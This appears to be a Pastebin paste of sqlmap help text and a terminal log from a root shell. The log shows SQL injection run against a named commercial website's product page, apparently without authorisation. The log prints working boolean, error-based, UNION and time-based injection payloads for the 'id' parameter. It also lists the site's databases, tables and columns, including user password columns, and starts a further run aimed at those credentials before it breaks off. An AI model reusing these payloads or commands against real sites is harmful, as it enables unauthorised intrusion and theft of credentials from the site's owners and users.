Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Usage: python sqlmap [options]
- Options:
- -h, --help Show basic help message and exit
- -hh Show advanced help message and exit
- --version Show program's version number and exit
- -v VERBOSE Verbosity level: 0-6 (default 1)
- Target:
- At least one of these options has to be provided to set the target(s)
- -u URL, --url=URL Target URL (e.g. "www.target.com/vuln.php?id=1")
- -g GOOGLEDORK Process Google dork results as target URLs
- Request:
- These options can be used to specify how to connect to the target URL
- --data=DATA Data string to be sent through POST
- --cookie=COOKIE HTTP Cookie header
- --random-agent Use randomly selected HTTP User-Agent header
- --proxy=PROXY Use a proxy to connect to the target URL
- --tor Use Tor anonymity network
- --check-tor Check to see if Tor is used properly
- Injection:
- These options can be used to specify which parameters to test for,
- provide custom injection payloads and optional tampering scripts
- -p TESTPARAMETER Testable parameter(s)
- --dbms=DBMS Force back-end DBMS to this value
- Detection:
- These options can be used to customize the detection phase
- --level=LEVEL Level of tests to perform (1-5, default 1)
- --risk=RISK Risk of tests to perform (0-3, default 1)
- Techniques:
- These options can be used to tweak testing of specific SQL injection
- techniques
- --technique=TECH SQL injection techniques to use (default "BEUSTQ")
- Enumeration:
- These options can be used to enumerate the back-end database
- management system information, structure and data contained in the
- tables. Moreover you can run your own SQL statements
- -a, --all Retrieve everything
- -b, --banner Retrieve DBMS banner
- --current-user Retrieve DBMS current user
- --current-db Retrieve DBMS current database
- --passwords Enumerate DBMS users password hashes
- --tables Enumerate DBMS database tables
- --columns Enumerate DBMS database table columns
- --schema Enumerate DBMS schema
- --dump Dump DBMS database table entries
- --dump-all Dump all DBMS databases tables entries
- -D DB DBMS database to enumerate
- -T TBL DBMS database table(s) to enumerate
- -C COL DBMS database table column(s) to enumerate
- Operating system access:
- These options can be used to access the back-end database management
- system underlying operating system
- --os-shell Prompt for an interactive operating system shell
- --os-pwn Prompt for an OOB shell, meterpreter or VNC
- General:
- These options can be used to set some general working parameters
- --batch Never ask for user input, use the default behaviour
- --flush-session Flush session files for current target
- Miscellaneous:
- --wizard Simple wizard interface for beginner users
- [!] to see full list of options run with '-hh'
- [*] shutting down at 00:04:47
- root@Gudiofor:~# sqlmap -u http://www.artefarma.com/produtos.php?id=26%27 --dbs
- sqlmap/1.0-dev - automatic SQL injection and database takeover tool
- http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 00:04:53
- [00:04:53] [WARNING] it appears that you have provided tainted parameter values ('id=26'') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
- Are you sure you want to continue? [y/N] y
- [00:04:54] [INFO] testing connection to the target URL
- [00:04:55] [INFO] heuristics detected web page charset 'ascii'
- [00:04:55] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
- [00:04:55] [INFO] testing if the target URL is stable. This can take a couple of seconds
- [00:04:56] [INFO] target URL is stable
- [00:04:56] [INFO] testing if GET parameter 'id' is dynamic
- [00:04:56] [INFO] confirming that GET parameter 'id' is dynamic
- [00:04:56] [INFO] GET parameter 'id' is dynamic
- [00:04:56] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
- [00:04:56] [INFO] testing for SQL injection on GET parameter 'id'
- heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
- do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] y
- [00:05:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
- [00:05:25] [WARNING] reflective value(s) found and filtering out
- [00:05:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
- [00:05:35] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
- [00:05:37] [INFO] GET parameter 'id' seems to be 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' injectable
- [00:05:37] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
- [00:05:38] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
- [00:05:38] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
- [00:05:38] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
- [00:05:38] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
- [00:05:38] [INFO] GET parameter 'id' is 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause' injectable
- [00:05:38] [INFO] testing 'MySQL inline queries'
- [00:05:38] [INFO] testing 'MySQL > 5.0.11 stacked queries'
- [00:05:38] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
- [00:05:39] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
- [00:05:39] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
- [00:05:39] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
- [00:05:39] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
- [00:05:39] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'
- [00:05:40] [INFO] testing 'MySQL > 5.0.11 OR time-based blind'
- [00:06:40] [INFO] GET parameter 'id' seems to be 'MySQL > 5.0.11 OR time-based blind' injectable
- [00:06:40] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
- [00:06:40] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
- [00:06:44] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
- [00:06:52] [INFO] target URL appears to be UNION injectable with 4 columns
- [00:06:53] [INFO] GET parameter 'id' is 'MySQL UNION query (random number) - 1 to 20 columns' injectable
- [00:06:53] [WARNING] in OR boolean-based injections, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
- GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
- sqlmap identified the following injection points with a total of 92 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
- Payload: id=-4224 OR (8424=8424)#
- Type: error-based
- Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause
- Payload: id=-6452 OR (SELECT 8984 FROM(SELECT COUNT(*),CONCAT(0x7168617871,(SELECT (CASE WHEN (8984=8984) THEN 1 ELSE 0 END)),0x7179756d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: UNION query
- Title: MySQL UNION query (random number) - 4 columns
- Payload: id=-2099 UNION ALL SELECT CONCAT(0x7168617871,0x654d70576654654b7a59,0x7179756d71),1532,1532,1532#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 OR time-based blind
- Payload: id=-4593 OR 5414=SLEEP(5)
- ---
- [00:07:35] [INFO] the back-end DBMS is MySQL
- web server operating system: Windows 2008 R2 or 7
- web application technology: ASP.NET, Microsoft IIS 7.5
- back-end DBMS: MySQL 5.0
- [00:07:35] [INFO] fetching database names
- [00:07:37] [INFO] the SQL query used returns 2 entries
- [00:07:37] [INFO] retrieved: "information_schema"
- [00:07:38] [INFO] retrieved: "artefarma_bdsqlartefarma"
- available databases [2]:
- [*] artefarma_bdsqlartefarma
- [*] information_schema
- [00:07:39] [WARNING] HTTP error codes detected during run:
- 500 (Internal Server Error) - 7 times
- [00:07:39] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.artefarma.com'
- [*] shutting down at 00:07:38
- root@Gudiofor:~# sqlmap -u http://www.artefarma.com/produtos.php?id=26%27 -D artefarma_bdsqlartefarma --columns
- sqlmap/1.0-dev - automatic SQL injection and database takeover tool
- http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 00:07:58
- [00:07:58] [WARNING] it appears that you have provided tainted parameter values ('id=26'') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
- Are you sure you want to continue? [y/N] y
- [00:07:59] [INFO] resuming back-end DBMS 'mysql'
- [00:07:59] [INFO] testing connection to the target URL
- [00:07:59] [INFO] heuristics detected web page charset 'ascii'
- [00:07:59] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
- Payload: id=-4224 OR (8424=8424)#
- Type: error-based
- Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause
- Payload: id=-6452 OR (SELECT 8984 FROM(SELECT COUNT(*),CONCAT(0x7168617871,(SELECT (CASE WHEN (8984=8984) THEN 1 ELSE 0 END)),0x7179756d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: UNION query
- Title: MySQL UNION query (random number) - 4 columns
- Payload: id=-2099 UNION ALL SELECT CONCAT(0x7168617871,0x654d70576654654b7a59,0x7179756d71),1532,1532,1532#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 OR time-based blind
- Payload: id=-4593 OR 5414=SLEEP(5)
- ---
- [00:07:59] [INFO] the back-end DBMS is MySQL
- web server operating system: Windows 2008 R2 or 7
- web application technology: ASP.NET, Microsoft IIS 7.5
- back-end DBMS: MySQL 5.0
- [00:07:59] [INFO] fetching tables for database: 'artefarma_bdsqlartefarma'
- [00:08:01] [WARNING] reflective value(s) found and filtering out
- [00:08:01] [INFO] the SQL query used returns 25 entries
- [00:08:02] [INFO] retrieved: "arquivos"
- [00:08:03] [INFO] retrieved: "clientes"
- [00:08:04] [INFO] retrieved: "contato"
- [00:08:05] [INFO] retrieved: "faq"
- [00:08:23] [INFO] retrieved: "galeriahome"
- [00:08:23] [INFO] retrieved: "galeriainstitucional"
- [00:08:24] [INFO] retrieved: "galeriaprodutos"
- [00:08:25] [INFO] retrieved: "galeriaprojetosespeciais"
- [00:08:30] [INFO] retrieved: "log_acesso"
- [00:08:31] [INFO] retrieved: "loja"
- [00:08:31] [INFO] retrieved: "loja_imagem"
- [00:08:31] [INFO] retrieved: "n_emails"
- [00:08:32] [INFO] retrieved: "noticias"
- [00:08:32] [INFO] retrieved: "pagclientes"
- [00:08:33] [INFO] retrieved: "pagcontato"
- [00:08:34] [INFO] retrieved: "paghome"
- [00:08:34] [INFO] retrieved: "paginstitucional"
- [00:08:34] [INFO] retrieved: "pagorcamento"
- [00:08:35] [INFO] retrieved: "pastas"
- [00:08:35] [INFO] retrieved: "produto"
- [00:08:35] [INFO] retrieved: "produtos"
- [00:08:36] [INFO] retrieved: "projetosespeciais"
- [00:08:36] [INFO] retrieved: "upload"
- [00:08:37] [INFO] retrieved: "usuario"
- [00:08:37] [INFO] retrieved: "usuarios"
- [00:08:37] [INFO] fetching columns for table 'log_acesso' in database 'artefarma_bdsqlartefarma'
- [00:08:38] [INFO] the SQL query used returns 5 entries
- [00:08:39] [INFO] retrieved: "log_cod","int(11)"
- [00:08:39] [INFO] retrieved: "log_lgn","varchar(45)"
- [00:08:40] [INFO] retrieved: "log_dta","datetime"
- [00:08:41] [INFO] retrieved: "log_ip","varchar(45)"
- [00:08:41] [INFO] retrieved: "log_reg","varchar(500)"
- [00:08:41] [INFO] fetching columns for table 'n_emails' in database 'artefarma_bdsqlartefarma'
- [00:08:42] [INFO] the SQL query used returns 5 entries
- [00:08:42] [INFO] retrieved: "id","int(11)"
- [00:08:42] [INFO] retrieved: "nome","varchar(100)"
- [00:08:43] [INFO] retrieved: "email","varchar(100)"
- [00:08:43] [INFO] retrieved: "codigo","varchar(150)"
- [00:08:43] [INFO] retrieved: "ativo","varchar(1)"
- [00:08:44] [INFO] fetching columns for table 'galeriaprojetosespeciais' in database 'artefarma_bdsqlartefarma'
- [00:08:44] [INFO] the SQL query used returns 5 entries
- [00:08:44] [INFO] retrieved: "id","int(11)"
- [00:08:45] [INFO] retrieved: "titulo","varchar(100)"
- [00:08:45] [INFO] retrieved: "miniatura","varchar(100)"
- [00:08:45] [INFO] retrieved: "ampliada","varchar(100)"
- [00:08:46] [INFO] retrieved: "idProjeto","int(11)"
- [00:08:46] [INFO] fetching columns for table 'upload' in database 'artefarma_bdsqlartefarma'
- [00:08:46] [INFO] the SQL query used returns 5 entries
- [00:08:46] [INFO] retrieved: "id","int(11)"
- [00:08:47] [INFO] retrieved: "name","varchar(45)"
- [00:08:47] [INFO] retrieved: "type","varchar(45)"
- [00:08:47] [INFO] retrieved: "size","int(11)"
- [00:08:48] [INFO] retrieved: "content","mediumblob"
- [00:08:48] [INFO] fetching columns for table 'noticias' in database 'artefarma_bdsqlartefarma'
- [00:08:48] [INFO] the SQL query used returns 6 entries
- [00:08:49] [INFO] retrieved: "id","int(11)"
- [00:08:49] [INFO] retrieved: "titulo","varchar(200)"
- [00:08:50] [INFO] retrieved: "imagemMiniatura","varchar(200)"
- [00:08:50] [INFO] retrieved: "imagemAmpliada","varchar(200)"
- [00:08:50] [INFO] retrieved: "resumoNoticia","varchar(500)"
- [00:08:51] [INFO] retrieved: "texto","text"
- [00:08:51] [INFO] fetching columns for table 'pagclientes' in database 'artefarma_bdsqlartefarma'
- [00:08:51] [INFO] the SQL query used returns 2 entries
- [00:08:52] [INFO] retrieved: "id","int(11)"
- [00:08:53] [INFO] retrieved: "texto","text"
- [00:08:53] [INFO] fetching columns for table 'clientes' in database 'artefarma_bdsqlartefarma'
- [00:08:53] [INFO] the SQL query used returns 4 entries
- [00:08:54] [INFO] retrieved: "id","int(11)"
- [00:08:55] [INFO] retrieved: "cliente","varchar(100)"
- [00:08:55] [INFO] retrieved: "logo","varchar(100)"
- [00:08:56] [INFO] retrieved: "site","varchar(200)"
- [00:08:56] [INFO] fetching columns for table 'pastas' in database 'artefarma_bdsqlartefarma'
- [00:08:58] [INFO] the SQL query used returns 3 entries
- [00:08:58] [INFO] retrieved: "id","int(11)"
- [00:08:59] [INFO] retrieved: "nome","varchar(200)"
- [00:08:59] [INFO] retrieved: "usuario","int(11)"
- [00:08:59] [INFO] fetching columns for table 'loja' in database 'artefarma_bdsqlartefarma'
- [00:09:00] [INFO] the SQL query used returns 5 entries
- [00:09:00] [INFO] retrieved: "loj_cod","int(11)"
- [00:09:02] [INFO] retrieved: "loj_nom","varchar(100)"
- [00:09:02] [INFO] retrieved: "loj_end","varchar(300)"
- [00:09:03] [INFO] retrieved: "loj_tel","varchar(45)"
- [00:09:03] [INFO] retrieved: "loj_frm","int(11)"
- [00:09:03] [INFO] fetching columns for table 'projetosespeciais' in database 'artefarma_bdsqlartefarma'
- [00:09:04] [INFO] the SQL query used returns 3 entries
- [00:09:04] [INFO] retrieved: "id","int(11)"
- [00:09:04] [INFO] retrieved: "titulo","varchar(50)"
- [00:09:05] [INFO] retrieved: "texto","text"
- [00:09:05] [INFO] fetching columns for table 'produto' in database 'artefarma_bdsqlartefarma'
- [00:09:05] [INFO] the SQL query used returns 4 entries
- [00:09:06] [INFO] retrieved: "prd_cod","int(11)"
- [00:09:06] [INFO] retrieved: "prd_nom","varchar(45)"
- [00:09:06] [INFO] retrieved: "prd_img","varchar(45)"
- [00:09:07] [INFO] retrieved: "prd_dsc","varchar(200)"
- [00:09:07] [INFO] fetching columns for table 'pagorcamento' in database 'artefarma_bdsqlartefarma'
- [00:09:08] [INFO] the SQL query used returns 2 entries
- [00:09:08] [INFO] retrieved: "id","int(11)"
- [00:09:09] [INFO] retrieved: "texto","text"
- [00:09:09] [INFO] fetching columns for table 'paginstitucional' in database 'artefarma_bdsqlartefarma'
- [00:09:09] [INFO] the SQL query used returns 4 entries
- [00:09:09] [INFO] retrieved: "id","int(11)"
- [00:09:10] [INFO] retrieved: "imgEsquerda","varchar(100)"
- [00:09:10] [INFO] retrieved: "tituloTexto","varchar(400)"
- [00:09:10] [INFO] retrieved: "texto","text"
- [00:09:10] [INFO] fetching columns for table 'produtos' in database 'artefarma_bdsqlartefarma'
- [00:09:11] [INFO] the SQL query used returns 3 entries
- [00:09:11] [INFO] retrieved: "id","int(11)"
- [00:09:11] [INFO] retrieved: "titulo","varchar(50)"
- [00:09:12] [INFO] retrieved: "texto","text"
- [00:09:12] [INFO] fetching columns for table 'galeriahome' in database 'artefarma_bdsqlartefarma'
- [00:09:12] [INFO] the SQL query used returns 4 entries
- [00:09:13] [INFO] retrieved: "id","int(11)"
- [00:09:13] [INFO] retrieved: "titulo","varchar(200)"
- [00:09:13] [INFO] retrieved: "miniatura","varchar(200)"
- [00:09:14] [INFO] retrieved: "ampliada","varchar(200)"
- [00:09:14] [INFO] fetching columns for table 'pagcontato' in database 'artefarma_bdsqlartefarma'
- [00:09:14] [INFO] the SQL query used returns 3 entries
- [00:09:15] [INFO] retrieved: "id","int(11)"
- [00:09:15] [INFO] retrieved: "texto","text"
- [00:09:15] [INFO] retrieved: "mapa","varchar(2000)"
- [00:09:16] [INFO] fetching columns for table 'faq' in database 'artefarma_bdsqlartefarma'
- [00:09:16] [INFO] the SQL query used returns 3 entries
- [00:09:16] [INFO] retrieved: "id","int(11)"
- [00:09:17] [INFO] retrieved: "titulo","varchar(200)"
- [00:09:17] [INFO] retrieved: "texto","text"
- [00:09:17] [INFO] fetching columns for table 'galeriaprodutos' in database 'artefarma_bdsqlartefarma'
- [00:09:18] [INFO] the SQL query used returns 5 entries
- [00:09:18] [INFO] retrieved: "id","int(11)"
- [00:09:18] [INFO] retrieved: "titulo","varchar(100)"
- [00:09:19] [INFO] retrieved: "miniatura","varchar(100)"
- [00:09:19] [INFO] retrieved: "ampliada","varchar(100)"
- [00:09:19] [INFO] retrieved: "idProduto","int(11)"
- [00:09:19] [INFO] fetching columns for table 'loja_imagem' in database 'artefarma_bdsqlartefarma'
- [00:09:20] [INFO] the SQL query used returns 4 entries
- [00:09:20] [INFO] retrieved: "lim_cod","int(11)"
- [00:09:21] [INFO] retrieved: "lim_dsc","varchar(45)"
- [00:09:21] [INFO] retrieved: "lim_src","varchar(45)"
- [00:09:22] [INFO] retrieved: "lim_sup","int(11)"
- [00:09:22] [INFO] fetching columns for table 'usuarios' in database 'artefarma_bdsqlartefarma'
- [00:09:22] [INFO] the SQL query used returns 4 entries
- [00:09:22] [INFO] retrieved: "id","int(11)"
- [00:09:23] [INFO] retrieved: "nome","varchar(200)"
- [00:09:23] [INFO] retrieved: "login","varchar(100)"
- [00:09:24] [INFO] retrieved: "senha","varchar(300)"
- [00:09:25] [INFO] fetching columns for table 'galeriainstitucional' in database 'artefarma_bdsqlartefarma'
- [00:09:25] [INFO] the SQL query used returns 4 entries
- [00:09:25] [INFO] retrieved: "id","int(11)"
- [00:09:26] [INFO] retrieved: "titulo","varchar(200)"
- [00:09:26] [INFO] retrieved: "miniatura","varchar(100)"
- [00:09:26] [INFO] retrieved: "ampliada","varchar(100)"
- [00:09:26] [INFO] fetching columns for table 'usuario' in database 'artefarma_bdsqlartefarma'
- [00:09:27] [INFO] the SQL query used returns 4 entries
- [00:09:27] [INFO] retrieved: "usu_cod","int(11)"
- [00:09:28] [INFO] retrieved: "usu_nom","varchar(45)"
- [00:09:29] [INFO] retrieved: "usu_pwd","varchar(500)"
- [00:09:29] [INFO] retrieved: "usu_tip","int(11)"
- [00:09:30] [INFO] fetching columns for table 'arquivos' in database 'artefarma_bdsqlartefarma'
- [00:09:30] [INFO] the SQL query used returns 4 entries
- [00:09:31] [INFO] retrieved: "id","int(11)"
- [00:09:32] [INFO] retrieved: "nome","varchar(200)"
- [00:09:33] [INFO] retrieved: "arquivo","varchar(200)"
- [00:09:34] [INFO] retrieved: "pasta","int(11)"
- [00:09:34] [INFO] fetching columns for table 'contato' in database 'artefarma_bdsqlartefarma'
- [00:09:34] [INFO] the SQL query used returns 10 entries
- [00:09:35] [INFO] retrieved: "id","int(11)"
- [00:09:36] [INFO] retrieved: "telefone1","varchar(13)"
- [00:09:36] [INFO] retrieved: "telefone2","varchar(13)"
- [00:09:36] [INFO] retrieved: "email","varchar(50)"
- [00:09:37] [INFO] retrieved: "endereco","varchar(100)"
- [00:09:37] [INFO] retrieved: "numero","varchar(20)"
- [00:09:38] [INFO] retrieved: "bairro","varchar(50)"
- [00:09:38] [INFO] retrieved: "cidade","varchar(50)"
- [00:09:39] [INFO] retrieved: "estado","varchar(2)"
- [00:09:40] [INFO] retrieved: "cep","varchar(9)"
- [00:09:40] [INFO] fetching columns for table 'paghome' in database 'artefarma_bdsqlartefarma'
- [00:09:40] [INFO] the SQL query used returns 5 entries
- [00:09:41] [INFO] retrieved: "id","int(11)"
- [00:09:42] [INFO] retrieved: "imgDestaque","varchar(100)"
- [00:09:42] [INFO] retrieved: "textoDestaque","varchar(200)"
- [00:09:42] [INFO] retrieved: "linkDestaque","varchar(300)"
- [00:09:43] [INFO] retrieved: "janelaLinkDestaque","varchar(6)"
- Database: artefarma_bdsqlartefarma
- Table: log_acesso
- [5 columns]
- +---------+--------------+
- | Column | Type |
- +---------+--------------+
- | log_cod | int(11) |
- | log_dta | datetime |
- | log_ip | varchar(45) |
- | log_lgn | varchar(45) |
- | log_reg | varchar(500) |
- +---------+--------------+
- Database: artefarma_bdsqlartefarma
- Table: n_emails
- [5 columns]
- +--------+--------------+
- | Column | Type |
- +--------+--------------+
- | ativo | varchar(1) |
- | codigo | varchar(150) |
- | email | varchar(100) |
- | id | int(11) |
- | nome | varchar(100) |
- +--------+--------------+
- Database: artefarma_bdsqlartefarma
- Table: galeriaprojetosespeciais
- [5 columns]
- +-----------+--------------+
- | Column | Type |
- +-----------+--------------+
- | ampliada | varchar(100) |
- | id | int(11) |
- | idProjeto | int(11) |
- | miniatura | varchar(100) |
- | titulo | varchar(100) |
- +-----------+--------------+
- Database: artefarma_bdsqlartefarma
- Table: contato
- [10 columns]
- +-----------+--------------+
- | Column | Type |
- +-----------+--------------+
- | bairro | varchar(50) |
- | cep | varchar(9) |
- | cidade | varchar(50) |
- | email | varchar(50) |
- | endereco | varchar(100) |
- | estado | varchar(2) |
- | id | int(11) |
- | numero | varchar(20) |
- | telefone1 | varchar(13) |
- | telefone2 | varchar(13) |
- +-----------+--------------+
- Database: artefarma_bdsqlartefarma
- Table: noticias
- [6 columns]
- +-----------------+--------------+
- | Column | Type |
- +-----------------+--------------+
- | id | int(11) |
- | imagemAmpliada | varchar(200) |
- | imagemMiniatura | varchar(200) |
- | resumoNoticia | varchar(500) |
- | texto | text |
- | titulo | varchar(200) |
- +-----------------+--------------+
- Database: artefarma_bdsqlartefarma
- Table: pagclientes
- [2 columns]
- +--------+---------+
- | Column | Type |
- +--------+---------+
- | id | int(11) |
- | texto | text |
- +--------+---------+
- Database: artefarma_bdsqlartefarma
- Table: clientes
- [4 columns]
- +---------+--------------+
- | Column | Type |
- +---------+--------------+
- | cliente | varchar(100) |
- | id | int(11) |
- | logo | varchar(100) |
- | site | varchar(200) |
- +---------+--------------+
- Database: artefarma_bdsqlartefarma
- Table: pastas
- [3 columns]
- +---------+--------------+
- | Column | Type |
- +---------+--------------+
- | id | int(11) |
- | nome | varchar(200) |
- | usuario | int(11) |
- +---------+--------------+
- Database: artefarma_bdsqlartefarma
- Table: loja
- [5 columns]
- +---------+--------------+
- | Column | Type |
- +---------+--------------+
- | loj_cod | int(11) |
- | loj_end | varchar(300) |
- | loj_frm | int(11) |
- | loj_nom | varchar(100) |
- | loj_tel | varchar(45) |
- +---------+--------------+
- Database: artefarma_bdsqlartefarma
- Table: projetosespeciais
- [3 columns]
- +--------+-------------+
- | Column | Type |
- +--------+-------------+
- | id | int(11) |
- | texto | text |
- | titulo | varchar(50) |
- +--------+-------------+
- Database: artefarma_bdsqlartefarma
- Table: produto
- [4 columns]
- +---------+--------------+
- | Column | Type |
- +---------+--------------+
- | prd_cod | int(11) |
- | prd_dsc | varchar(200) |
- | prd_img | varchar(45) |
- | prd_nom | varchar(45) |
- +---------+--------------+
- Database: artefarma_bdsqlartefarma
- Table: pagorcamento
- [2 columns]
- +--------+---------+
- | Column | Type |
- +--------+---------+
- | id | int(11) |
- | texto | text |
- +--------+---------+
- Database: artefarma_bdsqlartefarma
- Table: paginstitucional
- [4 columns]
- +-------------+--------------+
- | Column | Type |
- +-------------+--------------+
- | id | int(11) |
- | imgEsquerda | varchar(100) |
- | texto | text |
- | tituloTexto | varchar(400) |
- +-------------+--------------+
- Database: artefarma_bdsqlartefarma
- Table: produtos
- [3 columns]
- +--------+-------------+
- | Column | Type |
- +--------+-------------+
- | id | int(11) |
- | texto | text |
- | titulo | varchar(50) |
- +--------+-------------+
- Database: artefarma_bdsqlartefarma
- Table: galeriahome
- [4 columns]
- +-----------+--------------+
- | Column | Type |
- +-----------+--------------+
- | ampliada | varchar(200) |
- | id | int(11) |
- | miniatura | varchar(200) |
- | titulo | varchar(200) |
- +-----------+--------------+
- Database: artefarma_bdsqlartefarma
- Table: pagcontato
- [3 columns]
- +--------+---------------+
- | Column | Type |
- +--------+---------------+
- | id | int(11) |
- | mapa | varchar(2000) |
- | texto | text |
- +--------+---------------+
- Database: artefarma_bdsqlartefarma
- Table: faq
- [3 columns]
- +--------+--------------+
- | Column | Type |
- +--------+--------------+
- | id | int(11) |
- | texto | text |
- | titulo | varchar(200) |
- +--------+--------------+
- Database: artefarma_bdsqlartefarma
- Table: galeriaprodutos
- [5 columns]
- +-----------+--------------+
- | Column | Type |
- +-----------+--------------+
- | ampliada | varchar(100) |
- | id | int(11) |
- | idProduto | int(11) |
- | miniatura | varchar(100) |
- | titulo | varchar(100) |
- +-----------+--------------+
- Database: artefarma_bdsqlartefarma
- Table: loja_imagem
- [4 columns]
- +---------+-------------+
- | Column | Type |
- +---------+-------------+
- | lim_cod | int(11) |
- | lim_dsc | varchar(45) |
- | lim_src | varchar(45) |
- | lim_sup | int(11) |
- +---------+-------------+
- Database: artefarma_bdsqlartefarma
- Table: usuarios
- [4 columns]
- +--------+--------------+
- | Column | Type |
- +--------+--------------+
- | id | int(11) |
- | login | varchar(100) |
- | nome | varchar(200) |
- | senha | varchar(300) |
- +--------+--------------+
- Database: artefarma_bdsqlartefarma
- Table: galeriainstitucional
- [4 columns]
- +-----------+--------------+
- | Column | Type |
- +-----------+--------------+
- | ampliada | varchar(100) |
- | id | int(11) |
- | miniatura | varchar(100) |
- | titulo | varchar(200) |
- +-----------+--------------+
- Database: artefarma_bdsqlartefarma
- Table: usuario
- [4 columns]
- +---------+--------------+
- | Column | Type |
- +---------+--------------+
- | usu_cod | int(11) |
- | usu_nom | varchar(45) |
- | usu_pwd | varchar(500) |
- | usu_tip | int(11) |
- +---------+--------------+
- Database: artefarma_bdsqlartefarma
- Table: arquivos
- [4 columns]
- +---------+--------------+
- | Column | Type |
- +---------+--------------+
- | arquivo | varchar(200) |
- | id | int(11) |
- | nome | varchar(200) |
- | pasta | int(11) |
- +---------+--------------+
- Database: artefarma_bdsqlartefarma
- Table: upload
- [5 columns]
- +---------+-------------+
- | Column | Type |
- +---------+-------------+
- | size | int(11) |
- | content | mediumblob |
- | id | int(11) |
- | name | varchar(45) |
- | type | varchar(45) |
- +---------+-------------+
- Database: artefarma_bdsqlartefarma
- Table: paghome
- [5 columns]
- +--------------------+--------------+
- | Column | Type |
- +--------------------+--------------+
- | id | int(11) |
- | imgDestaque | varchar(100) |
- | janelaLinkDestaque | varchar(6) |
- | linkDestaque | varchar(300) |
- | textoDestaque | varchar(200) |
- +--------------------+--------------+
- [00:09:43] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.artefarma.com'
- [*] shutting down at 00:09:43
- root@Gudiofor:~# sqlmap -u http://www.artefarma.com/produtos.php?id=26%27 -D artefarma_bdsqlartefarma -C usu_cod,usu_nom,usu_pwd,usu_tip --tables
- sqlmap/1.0-dev - automatic SQL injection and database takeover tool
- http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 00:11:35
- [00:11:35] [WARNING] it appears that you have provided tainted parameter values ('id=26'') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
- Are you sure you want to continue? [y/N] y
- [00:11:37] [INFO] resuming back-end DBMS 'mysql'
- [00:11:37] [INFO] testing connection to the target URL
- [00:11:37] [INFO] heuristics detected web page charset 'ascii'
- [00:11:37] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
- Payload: id=-4224 OR (8424=8424)#
- Type: error-based
- Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause
- Payload: id=-6452 OR (SELECT 8984 FROM(SELECT COUNT(*),CONCAT(0x7168617871,(SELECT (CASE WHEN (8984=8984) THEN 1 ELSE 0 END)),0x7179756d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: UNION query
- Title: MySQL UNION query (random number) - 4 columns
- Payload: id=-2099 UNION ALL SELECT CONCAT(0x7168617871,0x654d70576654654b7a59,0x7179756d71),1532,1532,1532#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 OR time-based blind
